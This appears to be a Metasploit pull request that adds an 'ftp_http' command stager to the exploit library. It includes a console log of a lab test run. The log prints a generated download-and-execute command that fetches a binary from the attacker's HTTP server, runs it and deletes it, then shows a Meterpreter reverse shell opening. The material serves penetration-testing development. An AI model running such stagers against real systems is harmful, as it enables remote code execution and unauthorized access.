### PR TITLE
Add Rex::Exploitation::CmdStagerFtpHttp to Msf::Exploit::CmdStager

### DIFF
--- a/lib/msf/core/exploit/cmd_stager.rb
+++ b/lib/msf/core/exploit/cmd_stager.rb
@@ -26,7 +26,8 @@ module Exploit::CmdStager
     :curl => Rex::Exploitation::CmdStagerCurl,
     :fetch => Rex::Exploitation::CmdStagerFetch,
     :lwprequest => Rex::Exploitation::CmdStagerLwpRequest,
-    :psh_invokewebrequest => Rex::Exploitation::CmdStagerPSHInvokeWebRequest
+    :psh_invokewebrequest => Rex::Exploitation::CmdStagerPSHInvokeWebRequest,
+    :ftp_http => Rex::Exploitation::CmdStagerFtpHttp,
   }
 
   # Constant for decoders - used when checking the default flavor decoder.
@@ -55,7 +56,7 @@ module Exploit::CmdStager
     flavors = STAGERS.keys if flavors.empty?
     flavors.unshift('auto')
 
-    server_conditions = ['CMDSTAGER::FLAVOR', 'in', %w{auto certutil tftp wget curl fetch lwprequest psh_invokewebrequest}]
+    server_conditions = ['CMDSTAGER::FLAVOR', 'in', %w{auto certutil tftp wget curl fetch lwprequest psh_invokewebrequest ftp_http}]
     register_options(
       [
         OptAddressLocal.new('SRVHOST', [true, 'The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.', '0.0.0.0' ], conditions: server_conditions),


### PR DESCRIPTION
Add `Rex::Exploitation::CmdStagerFtpHttp` command stager to `Msf::Exploit::CmdStager` library for use in Metasploit.

See https://github.com/rapid7/rex-exploitation/pull/33 for context and more information.

---

```
msf6 > use exploit/unix/webapp/test
[*] Using configured payload cmd/unix/reverse
msf6 exploit(unix/webapp/test) > show targets

Exploit targets:

   Id  Name
   --  ----
=> 0   Automatic (Unix In-Memory)
   1   Automatic (Linux Dropper)


msf6 exploit(unix/webapp/test) > set target 1
target => 1
msf6 exploit(unix/webapp/test) > set payload linux/x86/meterpreter/reverse_tcp 
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/test) > set rhosts 192.168.200.130 
rhosts => 192.168.200.130
msf6 exploit(unix/webapp/test) > set lhost  192.168.200.130 
lhost => 192.168.200.130
msf6 exploit(unix/webapp/test) > set cmdstager::flavor 
cmdstager::flavor => auto
msf6 exploit(unix/webapp/test) > set cmdstager::flavor ftp_http 
cmdstager::flavor => ftp_http
msf6 exploit(unix/webapp/test) > set verbose true
verbose => true
msf6 exploit(unix/webapp/test) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] Sending payload (150 bytes) ...
[*] Using URL: http://192.168.200.130:8080/qmqqh1fm6f
[*] Generated command stager: ["ftp -o /tmp/nYQTytCz http://192.168.200.130:8080/qmqqh1fm6f;chmod +x /tmp/nYQTytCz;/tmp/nYQTytCz;rm -f /tmp/nYQTytCz"]
[*] Client 192.168.200.130 (tnftp/20210827) requested /qmqqh1fm6f
[*] Sending payload to 192.168.200.130 (tnftp/20210827)
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (989032 bytes) to 192.168.200.130
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.130:42036) at 2022-07-16 04:02:37 -0400
[*] Command Stager progress - 100.00% done (116/116 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.200.130
OS           : Kali kali-rolling (Linux 5.16.0-kali7-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter >
```
